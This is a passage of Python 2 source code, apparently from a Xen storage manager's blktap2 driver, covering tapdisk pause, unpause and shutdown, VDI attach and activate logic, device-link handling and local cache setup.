return cls.launch_on_tap(blktap, path, _type, {"rdonly": rdonly})
except:
blktap.free()
raise
def shutdown(self, force = False):
TapCtl.close(self.pid, self.minor, force)
TapCtl.detach(self.pid, self.minor)
self.get_blktap().free()
def pause(self):
if not self.is_running():
raise TapdiskInvalidState(self)
TapCtl.pause(self.pid, self.minor)
self._set_dirty()
def unpause(self, _type=None, path=None, mirror=None, cbtlog = None):
if not self.is_paused():
raise TapdiskInvalidState(self)
# FIXME: should the arguments be optional?
if _type is None: _type = self.type
if path is None: path = self.path
TapCtl.unpause(self.pid, self.minor, _type, path, mirror=mirror,
cbtlog=cbtlog)
self._set_dirty()
def stats(self):
return json.loads(TapCtl.stats(self.pid, self.minor))
#
# NB. dirty/refresh: reload attributes on next access
#
def _set_dirty(self):
self._dirty = True
def _refresh(self, __get):
t = self.from_minor(__get('minor'))
self.__init__(t.pid, t.minor, t.type, t.path, t.state)
def __getattribute__(self, name):
def __get(name):
# NB. avoid recursion
return object.__getattribute__(self, name)
if __get('_dirty') and \
name in ['minor', 'type', 'path', 'state']:
self._refresh(__get)
self._dirty = False
return __get(name)
class PauseState:
RUNNING = 'R'
PAUSING = 'r'
PAUSED = 'P'
class Flags:
DEAD = 0x0001
CLOSED = 0x0002
QUIESCE_REQUESTED = 0x0004
QUIESCED = 0x0008
PAUSE_REQUESTED = 0x0010
PAUSED = 0x0020
SHUTDOWN_REQUESTED = 0x0040
LOCKING = 0x0080
RETRY_NEEDED = 0x0100
LOG_DROPPED = 0x0200
PAUSE_MASK = PAUSE_REQUESTED|PAUSED
def is_paused(self):
return not not (self.state & self.Flags.PAUSED)
def is_running(self):
return not (self.state & self.Flags.PAUSE_MASK)
def pause_state(self):
if self.state & self.Flags.PAUSED:
return self.PauseState.PAUSED
if self.state & self.Flags.PAUSE_REQUESTED:
return self.PauseState.PAUSING
return self.PauseState.RUNNING
@staticmethod
def _parse_minor(devpath):
regex = '%s/(blktap|tapdev)(\d+)$' % Blktap.DEV_BASEDIR
pattern = re.compile(regex)
groups = pattern.search(devpath)
if not groups:
raise Exception, \
"malformed tap device: '%s' (%s) " % (devpath, regex)
minor = groups.group(2)
return int(minor)
_major = None
@classmethod
def major(cls):
if cls._major: return cls._major
devices = file("/proc/devices")
for line in devices:
row = line.rstrip().split(' ')
if len(row) != 2: continue
major, name = row
if name != 'tapdev': continue
cls._major = int(major)
break
devices.close()
return cls._major
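# Illustrative lifecycle sketch for the Tapdisk wrapper above (the image path
# is a made-up example); this is, in simplified form, what VDI._tap_activate()
# and VDI._tap_deactivate() below do:
#
#   tapdisk = Tapdisk.launch('/path/to/disk.vhd', 'vhd', rdonly=False)
#   dev = tapdisk.get_devpath() # /dev/xen/blktap-2/tapdev<minor>
#   tapdisk.pause() # quiesce, e.g. before a snapshot
#   tapdisk.unpause() # optionally with a new type/path
#   tapdisk.shutdown() # close, detach and free the minor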
class VDI(object):
"""SR.vdi driver decorator for blktap2"""
CONF_KEY_ALLOW_CACHING = "vdi_allow_caching"
CONF_KEY_MODE_ON_BOOT = "vdi_on_boot"
CONF_KEY_CACHE_SR = "local_cache_sr"
CONF_KEY_O_DIRECT = "o_direct"
LOCK_CACHE_SETUP = "cachesetup"
ATTACH_DETACH_RETRY_SECS = 120
# number of seconds on top of NFS timeo mount option the tapdisk should
# wait before reporting errors. This is to allow a retry to succeed in case
# packets were lost the first time around, which prevented the NFS client
# from returning before the timeo is reached even if the NFS server did
# come back earlier
TAPDISK_TIMEOUT_MARGIN = 30
def __init__(self, uuid, target, driver_info):
self.target = self.TargetDriver(target, driver_info)
self._vdi_uuid = uuid
self._session = target.session
self.xenstore_data = scsiutil.update_XS_SCSIdata(uuid,scsiutil.gen_synthetic_page_data(uuid))
self.__o_direct = None
self.__o_direct_reason = None
self.lock = Lock("vdi", uuid)
def get_o_direct_capability(self, options):
"""Returns True/False based on licensing and caching_params"""
if self.__o_direct is not None:
return self.__o_direct, self.__o_direct_reason
if util.read_caching_is_restricted(self._session):
self.__o_direct = True
self.__o_direct_reason = "LICENSE_RESTRICTION"
elif not ((self.target.vdi.sr.handles("nfs") or self.target.vdi.sr.handles("ext") or self.target.vdi.sr.handles("smb"))):
self.__o_direct = True
self.__o_direct_reason = "SR_NOT_SUPPORTED"
elif not (options.get("rdonly") or self.target.vdi.parent):
util.SMlog(self.target.vdi)
self.__o_direct = True
self.__o_direct_reason = "NO_RO_IMAGE"
elif options.get("rdonly") and not self.target.vdi.parent:
self.__o_direct = True
self.__o_direct_reason = "RO_WITH_NO_PARENT"
elif options.get(self.CONF_KEY_O_DIRECT):
self.__o_direct = True
self.__o_direct_reason = "SR_OVERRIDE"
if self.__o_direct is None:
self.__o_direct = False
self.__o_direct_reason = ""
return self.__o_direct, self.__o_direct_reason
@classmethod
def from_cli(cls, uuid):
import VDI as sm
import XenAPI
session = XenAPI.xapi_local()
session.xenapi.login_with_password('root', '', '', 'SM')
target = sm.VDI.from_uuid(session, uuid)
driver_info = target.sr.srcmd.driver_info
session.xenapi.session.logout()
return cls(uuid, target, driver_info)
@staticmethod
def _tap_type(vdi_type):
"""Map a VDI type (e.g. 'raw') to a tapdisk driver type (e.g. 'aio')"""
return {
'raw' : 'aio',
'vhd' : 'vhd',
'iso' : 'aio', # for ISO SR
'aio' : 'aio', # for LVHD
'file' : 'aio',
'phy' : 'aio'
} [vdi_type]
def get_tap_type(self):
vdi_type = self.target.get_vdi_type()
return VDI._tap_type(vdi_type)
def get_phy_path(self):
return self.target.get_vdi_path()
class UnexpectedVDIType(Exception):
def __init__(self, vdi_type, target):
self.vdi_type = vdi_type
self.target = target
def __str__(self):
return \
"Target %s has unexpected VDI type '%s'" % \
(type(self.target), self.vdi_type)
VDI_PLUG_TYPE = { 'phy' : 'phy', # for NETAPP
'raw' : 'phy',
'aio' : 'tap', # for LVHD raw nodes
'iso' : 'tap', # for ISOSR
'file' : 'tap',
'vhd' : 'tap' }
def tap_wanted(self):
# 1. Let the target vdi_type decide
vdi_type = self.target.get_vdi_type()
try:
plug_type = self.VDI_PLUG_TYPE[vdi_type]
except KeyError:
raise self.UnexpectedVDIType(vdi_type,
self.target.vdi)
if plug_type == 'tap':
return True
elif self.target.vdi.sr.handles('udev'):
return True
# 2. Otherwise, there may be more reasons
#
# .. TBD
return False
class TargetDriver:
"""Safe target driver access."""
# NB. *Must* test caps for optional calls. Some targets
# actually implement some slots, but do not enable them. Just
# try/except would risk breaking compatibility.
def __init__(self, vdi, driver_info):
self.vdi = vdi
self._caps = driver_info['capabilities']
def has_cap(self, cap):
"""Determine if target has given capability"""
return cap in self._caps
def attach(self, sr_uuid, vdi_uuid):
#assert self.has_cap("VDI_ATTACH")
return self.vdi.attach(sr_uuid, vdi_uuid)
def detach(self, sr_uuid, vdi_uuid):
#assert self.has_cap("VDI_DETACH")
self.vdi.detach(sr_uuid, vdi_uuid)
def activate(self, sr_uuid, vdi_uuid):
if self.has_cap("VDI_ACTIVATE"):
return self.vdi.activate(sr_uuid, vdi_uuid)
def deactivate(self, sr_uuid, vdi_uuid):
if self.has_cap("VDI_DEACTIVATE"):
self.vdi.deactivate(sr_uuid, vdi_uuid)
#def resize(self, sr_uuid, vdi_uuid, size):
# return self.vdi.resize(sr_uuid, vdi_uuid, size)
def get_vdi_type(self):
_type = self.vdi.vdi_type
if not _type:
_type = self.vdi.sr.sr_vditype
if not _type:
raise VDI.UnexpectedVDIType(_type, self.vdi)
return _type
def get_vdi_path(self):
return self.vdi.path
class Link(object):
"""Relink a node under a common name"""
# NB. We have to provide the device node path during
# VDI.attach, but currently do not allocate the tapdisk minor
# before VDI.activate. Therefore these link classes relink existing
# devices under deterministic path names.
BASEDIR = None
def _mklink(self, target):
raise NotImplementedError("_mklink is not defined")
def _equals(self, target):
raise NotImplementedError("_equals is not defined")
def __init__(self, path):
self._path = path
@classmethod
def from_name(cls, name):
path = "%s/%s" % (cls.BASEDIR, name)
return cls(path)
@classmethod
def from_uuid(cls, sr_uuid, vdi_uuid):
name = "%s/%s" % (sr_uuid, vdi_uuid)
return cls.from_name(name)
def path(self):
return self._path
def stat(self):
return os.stat(self.path())
def mklink(self, target):
path = self.path()
util.SMlog("%s -> %s" % (self, target))
mkdirs(os.path.dirname(path))
try:
self._mklink(target)
except OSError, e:
# We do unlink during teardown, but have to stay
# idempotent. However, a *wrong* target should never
# be seen.
if e.errno != errno.EEXIST: raise
assert self._equals(target), "'%s' not equal to '%s'" % (path, target)
def unlink(self):
try:
os.unlink(self.path())
except OSError, e:
if e.errno != errno.ENOENT: raise
def __str__(self):
path = self.path()
return "%s(%s)" % (self.__class__.__name__, path)
class SymLink(Link):
"""Symlink some file to a common name"""
def readlink(self):
return os.readlink(self.path())
def symlink(self):
return self.path()
def _mklink(self, target):
os.symlink(target, self.path())
def _equals(self, target):
return self.readlink() == target
class DeviceNode(Link):
"""Relink a block device node to a common name"""
@classmethod
def _real_stat(cls, target):
"""stat() not on @target, but its realpath()"""
_target = os.path.realpath(target)
return os.stat(_target)
@classmethod
def is_block(cls, target):
"""Whether @target refers to a block device."""
return S_ISBLK(cls._real_stat(target).st_mode)
def _mklink(self, target):
st = self._real_stat(target)
if not S_ISBLK(st.st_mode):
raise self.NotABlockDevice(target, st)
os.mknod(self.path(), st.st_mode, st.st_rdev)
def _equals(self, target):
target_rdev = self._real_stat(target).st_rdev
return self.stat().st_rdev == target_rdev
def rdev(self):
st = self.stat()
assert S_ISBLK(st.st_mode)
return os.major(st.st_rdev), os.minor(st.st_rdev)
class NotABlockDevice(Exception):
def __init__(self, path, st):
self.path = path
self.st = st
def __str__(self):
return "%s is not a block device: %s" % (self.path, self.st)
class Hybrid(Link):
def __init__(self, path):
VDI.Link.__init__(self, path)
self._devnode = VDI.DeviceNode(path)
self._symlink = VDI.SymLink(path)
def rdev(self):
st = self.stat()
if S_ISBLK(st.st_mode): return self._devnode.rdev()
raise self._devnode.NotABlockDevice(self.path(), st)
def mklink(self, target):
if self._devnode.is_block(target):
self._obj = self._devnode
else:
self._obj = self._symlink
self._obj.mklink(target)
def _equals(self, target):
return self._obj._equals(target)
class PhyLink(SymLink): BASEDIR = "/dev/sm/phy"
# NB. Cannot use DeviceNodes, e.g. FileVDIs aren't bdevs.
class BackendLink(Hybrid): BASEDIR = "/dev/sm/backend"
# NB. Could be SymLinks as well, but saving major,minor pairs in
# Links enables neat state capturing when managing Tapdisks. Note
# that we essentially have a tap-ctl list replacement here. For
# now make it a 'Hybrid'. Likely to collapse into a DeviceNode as
# soon as ISOs are tapdisks.
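# For illustration, the resulting namespace for an attached and activated VDI
# looks roughly like this (UUIDs abbreviated):
#
# /dev/sm/phy/<sr_uuid>/<vdi_uuid> -> physical image path (LV, file, ...)
# /dev/sm/backend/<sr_uuid>/<vdi_uuid> -> tapdev block node (or the physical
# path again when no tapdisk is wanted)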
@staticmethod
def _tap_activate(phy_path, vdi_type, sr_uuid, options, pool_size = None):
tapdisk = Tapdisk.find_by_path(phy_path)
if not tapdisk:
blktap = Blktap.allocate()
blktap.set_pool_name(sr_uuid)
if pool_size:
blktap.set_pool_size(pool_size)
try:
tapdisk = \
Tapdisk.launch_on_tap(blktap,
phy_path,
VDI._tap_type(vdi_type),
options)
except:
blktap.free()
raise
util.SMlog("tap.activate: Launched %s" % tapdisk)
else:
util.SMlog("tap.activate: Found %s" % tapdisk)
return tapdisk.get_devpath()
@staticmethod
def _tap_deactivate(minor):
try:
tapdisk = Tapdisk.from_minor(minor)
except TapdiskNotRunning, e:
util.SMlog("tap.deactivate: Warning, %s" % e)
# NB. Should not be here unless the agent refcount
# broke. Also, a clean shutdown should not have leaked
# the recorded minor.
else:
tapdisk.shutdown()
util.SMlog("tap.deactivate: Shut down %s" % tapdisk)
@classmethod
def tap_pause(cls, session, sr_uuid, vdi_uuid, failfast=False):
"""
Pauses the tapdisk.
session: a XAPI session
sr_uuid: the UUID of the SR on which VDI lives
vdi_uuid: the UUID of the VDI to pause
failfast: controls whether the VDI lock should be acquired in a
non-blocking manner
"""
util.SMlog("Pause request for %s" % vdi_uuid)
vdi_ref = session.xenapi.VDI.get_by_uuid(vdi_uuid)
session.xenapi.VDI.add_to_sm_config(vdi_ref, 'paused', 'true')
sm_config = session.xenapi.VDI.get_sm_config(vdi_ref)
for key in filter(lambda x: x.startswith('host_'), sm_config.keys()):
host_ref = key[len('host_'):]
util.SMlog("Calling tap-pause on host %s" % host_ref)
if not cls.call_pluginhandler(session, host_ref,
sr_uuid, vdi_uuid, "pause", failfast=failfast):
# Failed to pause node
session.xenapi.VDI.remove_from_sm_config(vdi_ref, 'paused')
return False
return True
@classmethod
def tap_unpause(cls, session, sr_uuid, vdi_uuid, secondary = None,
activate_parents = False):
util.SMlog("Unpause request for %s secondary=%s" % (vdi_uuid, secondary))
vdi_ref = session.xenapi.VDI.get_by_uuid(vdi_uuid)
sm_config = session.xenapi.VDI.get_sm_config(vdi_ref)
for key in filter(lambda x: x.startswith('host_'), sm_config.keys()):
host_ref = key[len('host_'):]
util.SMlog("Calling tap-unpause on host %s" % host_ref)
if not cls.call_pluginhandler(session, host_ref,
sr_uuid, vdi_uuid, "unpause", secondary, activate_parents):
# Failed to unpause node
return False
session.xenapi.VDI.remove_from_sm_config(vdi_ref, 'paused')
return True
@classmethod
def tap_refresh(cls, session, sr_uuid, vdi_uuid, activate_parents = False):
util.SMlog("Refresh request for %s" % vdi_uuid)
vdi_ref = session.xenapi.VDI.get_by_uuid(vdi_uuid)
sm_config = session.xenapi.VDI.get_sm_config(vdi_ref)
for key in filter(lambda x: x.startswith('host_'), sm_config.keys()):
host_ref = key[len('host_'):]
util.SMlog("Calling tap-refresh on host %s" % host_ref)
if not cls.call_pluginhandler(session, host_ref,
sr_uuid, vdi_uuid, "refresh", None,
activate_parents=activate_parents):
# Failed to refresh node
return False
return True
@classmethod
def tap_status(cls, session, vdi_uuid):
"""Return True if disk is attached, false if it isn't"""
util.SMlog("Disk status request for %s" % vdi_uuid)
vdi_ref = session.xenapi.VDI.get_by_uuid(vdi_uuid)
sm_config = session.xenapi.VDI.get_sm_config(vdi_ref)
for key in filter(lambda x: x.startswith('host_'), sm_config.keys()):
return True
return False
@classmethod
def call_pluginhandler(cls, session, host_ref, sr_uuid, vdi_uuid, action,
secondary = None, activate_parents = False, failfast=False):
"""Optionally, activate the parent LV before unpausing"""
try:
args = {"sr_uuid":sr_uuid, "vdi_uuid":vdi_uuid,
"failfast": str(failfast)}
if secondary:
args["secondary"] = secondary
if activate_parents:
args["activate_parents"] = "true"
ret = session.xenapi.host.call_plugin(
host_ref, PLUGIN_TAP_PAUSE, action,
args)
return ret == "True"
except Exception, e:
util.logException("BLKTAP2:call_pluginhandler %s" % e)
return False
def _add_tag(self, vdi_uuid, writable):
util.SMlog("Adding tag to: %s" % vdi_uuid)
attach_mode = "RO"
if writable:
attach_mode = "RW"
vdi_ref = self._session.xenapi.VDI.get_by_uuid(vdi_uuid)
host_ref = self._session.xenapi.host.get_by_uuid(util.get_this_host())
sm_config = self._session.xenapi.VDI.get_sm_config(vdi_ref)
attached_as = util.attached_as(sm_config)
if NO_MULTIPLE_ATTACH and (attached_as == "RW" or \
(attached_as == "RO" and attach_mode == "RW")):
util.SMlog("need to reset VDI %s" % vdi_uuid)
if not resetvdis.reset_vdi(self._session, vdi_uuid, force=False,
term_output=False, writable=writable):
raise util.SMException("VDI %s not detached cleanly" % vdi_uuid)
sm_config = self._session.xenapi.VDI.get_sm_config(vdi_ref)
if sm_config.has_key('paused'):
util.SMlog("Paused or host_ref key found [%s]" % sm_config)
return False
host_key = "host_%s" % host_ref
assert not sm_config.has_key(host_key)
self._session.xenapi.VDI.add_to_sm_config(vdi_ref, host_key,
attach_mode)
sm_config = self._session.xenapi.VDI.get_sm_config(vdi_ref)
if sm_config.has_key('paused'):
util.SMlog("Found paused key, aborting")
self._session.xenapi.VDI.remove_from_sm_config(vdi_ref, host_key)
return False
util.SMlog("Activate lock succeeded")
return True
def _check_tag(self, vdi_uuid):
vdi_ref = self._session.xenapi.VDI.get_by_uuid(vdi_uuid)
sm_config = self._session.xenapi.VDI.get_sm_config(vdi_ref)
if sm_config.has_key('paused'):
util.SMlog("Paused key found [%s]" % sm_config)
return False
return True
def _remove_tag(self, vdi_uuid):
vdi_ref = self._session.xenapi.VDI.get_by_uuid(vdi_uuid)
host_ref = self._session.xenapi.host.get_by_uuid(util.get_this_host())
sm_config = self._session.xenapi.VDI.get_sm_config(vdi_ref)
host_key = "host_%s" % host_ref
if sm_config.has_key(host_key):
self._session.xenapi.VDI.remove_from_sm_config(vdi_ref, host_key)
util.SMlog("Removed host key %s for %s" % (host_key, vdi_uuid))
else:
util.SMlog("_remove_tag: host key %s not found, ignore" % host_key)
def _get_pool_config(self, pool_name):
pool_info = dict()
vdi_ref = self.target.vdi.sr.srcmd.params.get('vdi_ref')
if not vdi_ref:
# attach_from_config context: HA disks don't need to be in any
# special pool
return pool_info
session = XenAPI.xapi_local()
session.xenapi.login_with_password('root', '', '', 'SM')
sr_ref = self.target.vdi.sr.srcmd.params.get('sr_ref')
sr_config = session.xenapi.SR.get_other_config(sr_ref)
vdi_config = session.xenapi.VDI.get_other_config(vdi_ref)
pool_size_str = sr_config.get(POOL_SIZE_KEY)
pool_name_override = vdi_config.get(POOL_NAME_KEY)
if pool_name_override:
pool_name = pool_name_override
pool_size_override = vdi_config.get(POOL_SIZE_KEY)
if pool_size_override:
pool_size_str = pool_size_override
pool_size = 0
if pool_size_str:
try:
pool_size = int(pool_size_str)
if pool_size < 1 or pool_size > MAX_FULL_RINGS:
raise ValueError("outside of range")
pool_size = NUM_PAGES_PER_RING * pool_size
except ValueError:
util.SMlog("Error: invalid mem-pool-size %s" % pool_size_str)
pool_size = 0
pool_info["mem-pool"] = pool_name
if pool_size:
pool_info["mem-pool-size"] = str(pool_size)
session.xenapi.session.logout()
return pool_info
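# Worked example (illustrative): with NUM_PAGES_PER_RING = 32 * 11 = 352, an
# SR or VDI other-config entry mem-pool-size-rings=2 yields a
# "mem-pool-size" of 704 pages passed to the blktap pool.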
def attach(self, sr_uuid, vdi_uuid, writable, activate = False, caching_params = {}):
"""Return/dev/sm/backend symlink path"""
self.xenstore_data.update(self._get_pool_config(sr_uuid))
if not self.target.has_cap("ATOMIC_PAUSE") or activate:
util.SMlog("Attach & activate")
self._attach(sr_uuid, vdi_uuid)
dev_path = self._activate(sr_uuid, vdi_uuid,
{"rdonly": not writable})
self.BackendLink.from_uuid(sr_uuid, vdi_uuid).mklink(dev_path)
# Return backend/ link
back_path = self.BackendLink.from_uuid(sr_uuid, vdi_uuid).path()
options = {"rdonly": not writable}
options.update(caching_params)
o_direct, o_direct_reason = self.get_o_direct_capability(options)
struct = { 'params': back_path,
'o_direct': o_direct,
'o_direct_reason': o_direct_reason,
'xenstore_data': self.xenstore_data}
util.SMlog('result: %s' % struct)
try:
f=open("%s.attach_info" % back_path, 'a')
f.write(xmlrpclib.dumps((struct,), "", True))
f.close()
except:
pass
return xmlrpclib.dumps((struct,), "", True)
def activate(self, sr_uuid, vdi_uuid, writable, caching_params):
util.SMlog("blktap2.activate")
options = {"rdonly": not writable}
options.update(caching_params)
sr_ref = self.target.vdi.sr.srcmd.params.get('sr_ref')
sr_other_config = self._session.xenapi.SR.get_other_config(sr_ref)
timeout = nfs.get_nfs_timeout(sr_other_config)
if timeout:
# Note NFS timeout values are in deciseconds
timeout = int((timeout+5) / 10)
options["timeout"] = timeout + self.TAPDISK_TIMEOUT_MARGIN
for i in range(self.ATTACH_DETACH_RETRY_SECS):
try:
if self._activate_locked(sr_uuid, vdi_uuid, options):
return
except util.SRBusyException:
util.SMlog("SR locked, retrying")
time.sleep(1)
raise util.SMException("VDI %s locked" % vdi_uuid)
@locking("VDIUnavailable")
def _activate_locked(self, sr_uuid, vdi_uuid, options):
"""Wraps target.activate and adds a tapdisk"""
import VDI as sm
#util.SMlog("VDI.activate %s" % vdi_uuid)
if self.tap_wanted():
if not self._add_tag(vdi_uuid, not options["rdonly"]):
return False
# it is possible that while the VDI was paused some of its
# attributes have changed (e.g. its size if it was inflated; or its
# path if it was leaf-coalesced onto a raw LV), so refresh the
# object completely
params = self.target.vdi.sr.srcmd.params
target = sm.VDI.from_uuid(self.target.vdi.session, vdi_uuid)
target.sr.srcmd.params = params
driver_info = target.sr.srcmd.driver_info
self.target = self.TargetDriver(target, driver_info)
try:
util.fistpoint.activate_custom_fn(
"blktap_activate_inject_failure",
lambda: util.inject_failure())
# Attach the physical node
if self.target.has_cap("ATOMIC_PAUSE"):
self._attach(sr_uuid, vdi_uuid)
vdi_type = self.target.get_vdi_type()
# Take lvchange-p Lock before running
# tap-ctl open
# Needed to avoid race with lvchange -p which is
# now taking the same lock
# This is a fix for CA-155766
if hasattr(self.target.vdi.sr, 'DRIVER_TYPE') and \
self.target.vdi.sr.DRIVER_TYPE == 'lvhd' and \
vdi_type == vhdutil.VDI_TYPE_VHD:
lock = Lock("lvchange-p", lvhdutil.NS_PREFIX_LVM + sr_uuid)
lock.acquire()
# When we attach a static VDI for HA, we cannot communicate with
# xapi, because it has not started yet. These VDIs are raw.
if vdi_type != vhdutil.VDI_TYPE_RAW:
session = self.target.vdi.session
vdi_ref = session.xenapi.VDI.get_by_uuid(vdi_uuid)
sm_config = session.xenapi.VDI.get_sm_config(vdi_ref)
if 'key_hash' in sm_config:
key_hash = sm_config['key_hash']
options['key_hash'] = key_hash
options['vdi_uuid'] = vdi_uuid
util.SMlog('Using key with hash {} for VDI {}'.format(key_hash, vdi_uuid))
# Activate the physical node
dev_path = self._activate(sr_uuid, vdi_uuid, options)
if hasattr(self.target.vdi.sr, 'DRIVER_TYPE') and \
self.target.vdi.sr.DRIVER_TYPE == 'lvhd' and \
self.target.get_vdi_type() == vhdutil.VDI_TYPE_VHD:
lock.release()
except:
util.SMlog("Exception in activate/attach")
if self.tap_wanted():
util.fistpoint.activate_custom_fn(
"blktap_activate_error_handling",
lambda: time.sleep(30))
while True:
try:
self._remove_tag(vdi_uuid)
break
except xmlrpclib.ProtocolError, e:
# If there's a connection error, keep trying forever.
if e.errcode == httplib.INTERNAL_SERVER_ERROR:
continue
else:
util.SMlog('failed to remove tag: %s' % e)
break
except Exception, e:
util.SMlog('failed to remove tag: %s' % e)
break
raise
# Link result to backend/
self.BackendLink.from_uuid(sr_uuid, vdi_uuid).mklink(dev_path)
return True
def _activate(self, sr_uuid, vdi_uuid, options):
vdi_options = self.target.activate(sr_uuid, vdi_uuid)
dev_path = self.setup_cache(sr_uuid, vdi_uuid, options)
if not dev_path:
phy_path = self.PhyLink.from_uuid(sr_uuid, vdi_uuid).readlink()
# Maybe launch a tapdisk on the physical link
if self.tap_wanted():
vdi_type = self.target.get_vdi_type()
options["o_direct"] = self.get_o_direct_capability(options)[0]
if vdi_options:
options.update(vdi_options)
dev_path = self._tap_activate(phy_path, vdi_type, sr_uuid,
options,
self._get_pool_config(sr_uuid).get("mem-pool-size"))
else:
dev_path = phy_path # Just reuse phy
return dev_path
def _attach(self, sr_uuid, vdi_uuid):
attach_info = xmlrpclib.loads(self.target.attach(sr_uuid, vdi_uuid))[0][0]
params = attach_info['params']
xenstore_data = attach_info['xenstore_data']
phy_path = util.to_plain_string(params)
self.xenstore_data.update(xenstore_data)
# Save it to phy/
self.PhyLink.from_uuid(sr_uuid, vdi_uuid).mklink(phy_path)
def deactivate(self, sr_uuid, vdi_uuid, caching_params):
util.SMlog("blktap2.deactivate")
for i in range(self.ATTACH_DETACH_RETRY_SECS):
try:
if self._deactivate_locked(sr_uuid, vdi_uuid, caching_params):
return
except util.SRBusyException, e:
util.SMlog("SR locked, retrying")
time.sleep(1)
raise util.SMException("VDI %s locked" % vdi_uuid)
@locking("VDIUnavailable")
def _deactivate_locked(self, sr_uuid, vdi_uuid, caching_params):
"""Wraps target.deactivate and removes a tapdisk"""
#util.SMlog("VDI.deactivate %s" % vdi_uuid)
if self.tap_wanted() and not self._check_tag(vdi_uuid):
return False
self._deactivate(sr_uuid, vdi_uuid, caching_params)
if self.target.has_cap("ATOMIC_PAUSE"):
self._detach(sr_uuid, vdi_uuid)
if self.tap_wanted():
self._remove_tag(vdi_uuid)
return True
def _resetPhylink(self, sr_uuid, vdi_uuid, path):
self.PhyLink.from_uuid(sr_uuid, vdi_uuid).mklink(path)
def detach(self, sr_uuid, vdi_uuid, deactivate = False, caching_params = {}):
if not self.target.has_cap("ATOMIC_PAUSE") or deactivate:
util.SMlog("Deactivate & detach")
self._deactivate(sr_uuid, vdi_uuid, caching_params)
self._detach(sr_uuid, vdi_uuid)
else:
pass # nothing to do
def _deactivate(self, sr_uuid, vdi_uuid, caching_params):
import VDI as sm
# Shutdown tapdisk
back_link = self.BackendLink.from_uuid(sr_uuid, vdi_uuid)
if not util.pathexists(back_link.path()):
util.SMlog("Backend path %s does not exist" % back_link.path())
return
try:
attach_info_path = "%s.attach_info" % (back_link.path())
os.unlink(attach_info_path)
except:
util.SMlog("unlink of attach_info failed")
try:
major, minor = back_link.rdev()
except self.DeviceNode.NotABlockDevice:
pass
else:
if major == Tapdisk.major():
self._tap_deactivate(minor)
self.remove_cache(sr_uuid, vdi_uuid, caching_params)
# Remove the backend link
back_link.unlink()
# Deactivate & detach the physical node
if self.tap_wanted() and self.target.vdi.session is not None:
# it is possible that while the VDI was paused some of its
# attributes have changed (e.g. its size if it was inflated; or its
# path if it was leaf-coalesced onto a raw LV), so refresh the
# object completely
target = sm.VDI.from_uuid(self.target.vdi.session, vdi_uuid)
driver_info = target.sr.srcmd.driver_info
self.target = self.TargetDriver(target, driver_info)
self.target.deactivate(sr_uuid, vdi_uuid)
def _detach(self, sr_uuid, vdi_uuid):
self.target.detach(sr_uuid, vdi_uuid)
# Remove phy/
self.PhyLink.from_uuid(sr_uuid, vdi_uuid).unlink()
def _updateCacheRecord(self, session, vdi_uuid, on_boot, caching):
# Remove existing VDI.sm_config fields
vdi_ref = session.xenapi.VDI.get_by_uuid(vdi_uuid)
for key in ["on_boot", "caching"]:
session.xenapi.VDI.remove_from_sm_config(vdi_ref,key)
if on_boot is not None:
session.xenapi.VDI.add_to_sm_config(vdi_ref,'on_boot',on_boot)
if caching is not None:
session.xenapi.VDI.add_to_sm_config(vdi_ref,'caching',caching)
def setup_cache(self, sr_uuid, vdi_uuid, params):
if params.get(self.CONF_KEY_ALLOW_CACHING) != "true":
return
util.SMlog("Requested local caching")
if not self.target.has_cap("SR_CACHING"):
util.SMlog("Error: local caching not supported by this SR")
return
scratch_mode = False
if params.get(self.CONF_KEY_MODE_ON_BOOT) == "reset":
scratch_mode = True
util.SMlog("Requested scratch mode")
if not self.target.has_cap("VDI_RESET_ON_BOOT/2"):
util.SMlog("Error: scratch mode not supported by this SR")
return
dev_path = None
local_sr_uuid = params.get(self.CONF_KEY_CACHE_SR)
if not local_sr_uuid:
util.SMlog("ERROR: Local cache SR not specified, not enabling")
return
dev_path = self._setup_cache(self._session, sr_uuid, vdi_uuid,
local_sr_uuid, scratch_mode, params)
if dev_path:
self._updateCacheRecord(self._session, self.target.vdi.uuid,
params.get(self.CONF_KEY_MODE_ON_BOOT),
params.get(self.CONF_KEY_ALLOW_CACHING))
return dev_path
def alert_no_cache(self, session, vdi_uuid, cache_sr_uuid, err):
vm_uuid = None
vm_label = ""
try:
cache_sr_ref = session.xenapi.SR.get_by_uuid(cache_sr_uuid)
cache_sr_rec = session.xenapi.SR.get_record(cache_sr_ref)
cache_sr_label = cache_sr_rec.get("name_label")
host_ref = session.xenapi.host.get_by_uuid(util.get_this_host())
host_rec = session.xenapi.host.get_record(host_ref)
host_label = host_rec.get("name_label")
vdi_ref = session.xenapi.VDI.get_by_uuid(vdi_uuid)
vbds = session.xenapi.VBD.get_all_records_where( \
"field \"VDI\" = \"%s\"" % vdi_ref)
for vbd_rec in vbds.values():
vm_ref = vbd_rec.get("VM")
vm_rec = session.xenapi.VM.get_record(vm_ref)
vm_uuid = vm_rec.get("uuid")
vm_label = vm_rec.get("name_label")
except:
util.logException("alert_no_cache")
alert_obj = "SR"
alert_uuid = str(cache_sr_uuid)
alert_str = "No space left in Local Cache SR %s" % cache_sr_uuid
if vm_uuid:
alert_obj = "VM"
alert_uuid = vm_uuid
reason = ""
if err == errno.ENOSPC:
reason = "because there is no space left"
alert_str = "The VM \"%s\" is not using IntelliCache %s on the Local Cache SR (\"%s\") on host \"%s\"" % \
(vm_label, reason, cache_sr_label, host_label)
util.SMlog("Creating alert: (%s, %s, \"%s\")" % \
(alert_obj, alert_uuid, alert_str))
session.xenapi.message.create("No space left in local cache", "3",
alert_obj, alert_uuid, alert_str)
def _setup_cache(self, session, sr_uuid, vdi_uuid, local_sr_uuid,
scratch_mode, options):
import SR
import EXTSR
import NFSSR
import XenAPI
from lock import Lock
from FileSR import FileVDI
parent_uuid = vhdutil.getParent(self.target.vdi.path,
FileVDI.extractUuid)
if not parent_uuid:
util.SMlog("ERROR: VDI %s has no parent, not enabling" % \
self.target.vdi.uuid)
return
util.SMlog("Setting up cache")
parent_uuid = parent_uuid.strip()
shared_target = NFSSR.NFSFileVDI(self.target.vdi.sr, parent_uuid)
if shared_target.parent:
util.SMlog("ERROR: Parent VDI %s has parent, not enabling" %
shared_target.uuid)
return
SR.registerSR(EXTSR.EXTSR)
local_sr = SR.SR.from_uuid(session, local_sr_uuid)
lock = Lock(self.LOCK_CACHE_SETUP, parent_uuid)
lock.acquire()
# read cache
read_cache_path = "%s/%s.vhdcache" % (local_sr.path, shared_target.uuid)
if util.pathexists(read_cache_path):
util.SMlog("Read cache node (%s) already exists, not creating" % \
read_cache_path)
else:
try:
vhdutil.snapshot(read_cache_path, shared_target.path, False)
except util.CommandException, e:
